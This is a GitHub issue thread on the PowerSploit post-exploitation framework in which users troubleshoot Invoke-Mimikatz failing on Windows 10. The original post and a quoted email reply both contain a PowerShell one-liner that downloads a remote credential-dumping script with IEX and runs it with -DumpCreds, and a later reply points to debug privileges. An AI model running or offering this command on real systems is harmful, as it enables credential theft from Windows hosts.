PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework
Other
11.68k stars 4.59k forks source link

Mimkatz not working on windows 10. #319

Open exrme18 opened 5 years ago

exrme18 commented 5 years ago

Hello, I am trying to invoke the mimikatz but getting the following error:

screenshot 2019-03-06 at 7 34 05 pm

I have tried on two different versions: Windows Version Details- Win-10 Version 1803 (Build 17134.165) Win-10 Version 1809 (Build 17763.107) October build.

Command used:

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent
.com/EmpireProject/Empire/7efb7eeaabeb3daf916ead7856bb621bbca331f4/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Similarly I have tried dev and master ps but none of them worked for me. Any solution would be appreciated Thanks

pentester23 commented 5 years ago

Hey mate,

if someone could help you, please let me know! I have the same problem :/

Best regards kalinux

Am Mi., 6. März 2019 um 15:35 Uhr schrieb exrme18 <notifications@github.com

:

Hello, I am trying to invoke the mimikatz but getting the following error:

[image: screenshot 2019-03-06 at 7 34 05 pm] https://user-images.githubusercontent.com/40659223/53886918-1d4dbb80-4047-11e9-92cf-3ffbaf4172b0.png

I have tried on two different versions: Windows Version Details- Win-10 Version 1803 (Build 17134.165) Win-10 Version 1809 (Build 17763.107) October build.

Command used:

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent

.com/EmpireProject/Empire/7efb7eeaabeb3daf916ead7856bb621bbca331f4/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Similarly I have tried dev and master ps but none of them worked for me. Any solution would be appreciated Thanks

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/PowerShellMafia/PowerSploit/issues/319, or mute the thread https://github.com/notifications/unsubscribe-auth/AoB3UGUEPbQXLQmK1nLhUlUB1Su5tYRPks5vT9JAgaJpZM4bg9yK .

--

Josef Gartner GmbH Firmensitz: Gartnerstr. 20, 89423 Gundelfingen

Registergericht: AG Augsburg, HR B 19150 Geschäftsführer: Klaus Lother, Jürgen Wax Vorsitzender des Aufsichtsrats: Dr. Fritz Gartner Bitte beachten Sie unsere Hinweise zum Datenschutz auf www.josef-gartner.de https://josef-gartner.permasteelisagroup.com/de/data-protection/ (english version: Privacy Policy https://josef-gartner.permasteelisagroup.com/en/data-protection/) sowie die Hinweise zur Datenverarbeitung (PDF http://josef-gartner.permasteelisagroup.com/media/3412/1806_hinweise_datenverarbeitung_allgemein.pdf). 

-- This email  and any files enclosed, contain  confidential business   information for  use  only  by  the  addressee.  Please  note   that,  in   accordance  with Permasteelisa Group Policy,  the Company could read them. Any views or opinions presented  in  this email are solely those of the author and do not necessarily represent  those  of the Company. If you   have received  this  email in error, please delete it from your system. Any  use or distribution of the contents of this email  by a not-intended recipient or in violation of the purposes of this email is strictly prohibited and could be unlawful. Permasteelisa Group accepts no liability   for  any damage  caused by any virus, worm, trojan program or any other malicious program transmitted by this email.

dz-yamh commented 5 years ago

Does the account you're using to run that PowerShell instance have the right to debug programs? You can check in Local Security Policy > User Rights Assignment or running the privilege::debug command using Mimikatz